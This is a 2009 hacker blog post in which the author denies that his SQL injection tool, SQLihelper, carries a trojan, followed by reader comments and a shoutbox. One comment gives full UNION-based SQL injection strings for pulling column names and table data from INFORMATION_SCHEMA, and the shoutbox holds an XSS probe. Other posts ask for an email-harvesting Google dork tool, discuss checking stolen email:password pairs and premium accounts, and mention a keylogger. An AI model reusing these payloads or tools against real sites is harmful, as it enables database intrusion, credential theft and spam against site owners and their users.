Reiluke

nobody is safe online

Home » Post Item » SQLihelper as trojan

SQLihelper as trojan

September 1, 2009

 

i dont know why the sqlihelper executables are detected as “trojan.win32.agent2.chtj”, it is fucking false positive, some fool spreading my app with a binded trojan and now my executables are detected also

i rebuild the source and now the exe is not detected anymore

download link

 

for those that emailed me, i dont put trojan in my apps, run it on a sandbox, if you can find proof you can post it in the shoutbox

right now im working on the email check and rapidshare checker using api

Posted by reiluke at 10:47 am | permalink

Previous Comments

Hello friend!

you are too good, i used ur tools and they are too good .. well i m very excited to see what next give us.

Well i have 1 idea for u to make 1 new tool for us .. as u know we guys need leads (email list) so can u make google email grabber .. with options like u use in Exploit Scanner (dork + site(.com,.net,.au,.eu) + results per page(10 or 100) and extract 1 more option (name) ) becoz we guys use mostly names

like

steve intext:”@example.com” site:.com

but this is a headache becoz we need to page 1 by 1.

so please kindly help us to do this job.

thank you very very much

Posted by MaxDeMon at September 13, 2009, 3:38 am

yeah s0me of other people bind your sql helper with trojan ….. btw reiluke plz join philker group onhackforum.net I need a skilled pinoy like you .. l0l

Posted by krizhiel at September 13, 2009, 7:36 pm

Great tool. Congratz!

I’ve found some points that might require your attention for future releases.

Get Columns
Your command line
+and+1=0+%20Union%20Select%20%201%20,%20UNHEX(HEX(concat(0×5B6B65795D,column_name,0×5B6B65795D)))%20,3,4,5,6,7,8+FROM+INFORMATION_SCHEMA.columns+where+table_name=Concat(char(83),char(69),char(78),char(72),char(65))+LIMIT%201,1–

It is starting with limit at 1,1 instead of 0,1. So, first column_name is not being captured.

It does not include an additional table_schema condition once it is possible to have the same table_name in more than one database.

Proposed command line
+and+1=0+%20Union%20Select%20%201%20,%20UNHEX(HEX(concat(0×5B6B65795D,column_name,0×5B6B65795D)))%20,3,4,5,6,7,8+FROM+INFORMATION_SCHEMA.columns+where+table_name=Concat(char(83),char(69),char(78),char(72),char(65))%20AND%20table_schema=Concat(char(117),char(115),char(117),char(97),char(114),char(105),char(111))+LIMIT%200,1–

Dump Now
When dumping, limit operator is skipping some rows, i.e., it would be expected it follows a sequential logic (0,1 - 1,1 - 2,1 - …). However, it sometimes is not performing as expected (… - 5,1 - 6,1 - 7,1 - 8,1 - 10,1 - 12,1), So that, current dumped value is not equal to the counted one and therefore not all data are being extrated.

Posted by aklnuts at September 15, 2009, 3:47 am

still detect trojan. Please check your pc

Posted by sangte at September 17, 2009, 12:23 am

detected napod bai sa kaspersky imong bag-o nga gicompile sqlihelper. tsk tsk tsk

Posted by kamayutak at September 17, 2009, 5:51 pm

All comments are moderated. Your comments will not appear here unless approved by the blog owner. Thank you.

Add a comment








Meter

Say Somethin'

eugene:

can anyone post a working email checker? will be very much appreciated

123:

san ka sa pilipinas?

">alert(String.fromCharCode(88, 83, 83)):

“>alert(String.fromCharCode(88, 83, 83))

">alert(String.fromCharCode(88, 83, 83)):

“>alert(String.fromCharCode(88, 83, 83))

Pedro Jacques:

Anyone has a idea to use post method in sqlihelper? Thnkxxx

aryanne:

someone have sign up code for shopadmin.cc? please email it to me… richardsilly888@yahoo.com

Pedro Jacques:

How to work with post method in sqlihelper 2.7?

!!!!!:

http://www.sunbeltsecurity.com/threatdisplay.aspx?name=Trojan.Win32.Agent2.cmdd&tid=4655164&cs=9D02F413D6D4F1E4E328F3A7F786E24C

itx backdoored :P AVG detected chk link and c level of infection

admen:

Can you make a mirror to your tools ? Rapidshare sucks ..

itsme:

email checker isnt working indeed.. all emails are correct, even with 3 characters :o

abdulahaveh:

e-mail checker dont workkkkkkkkkkkkkkkkkkkkkkk

Dexa:

Email checker don work :(

PBL:

Sup, there seems to be a problem with your email checker as it places invalid email:pass in the valid section, pretty much all the emails are transfered to the valid box

pacman:

nice blog site. ok na ok.
anyway share ko lang po. you can watch manny pacquiao video collection here:
http://boxing-tube.tk
or here:
http://mannypacquiao.tk

Ralf69:

New Rapidshare Collector’s & Premium Accounts Checker.
Demo: http://ralf69.justfree.com/
I will sell script for mass verification data Rapidshare Collector’s & Premium Accounts.

ZaraByte:

@rd0 Linux users don’t need sql injecting programs they already know how to manually Inject or dont even waste there time :P

rd0:

There is a version of SQLiHelper for linux?
i try whit mono but doesnt work..

mox:

looking for a sqli scanner, that scans not only php but also cfm and asp. Thanks !

calvin:

After I used the exploit scanner, I got like 600 sites to be tested. sql error based is check marked and I click test, the progress bar runs to 100% in like 2seconds and no vuln sites are shown on the list

butterflycode:

the keylogger html alwasys prompt a ” There was a problem with the request ” everytime its being opened.? the the prob bro? pls mail me. thanks and waiting for ur reply

Leave a message ▼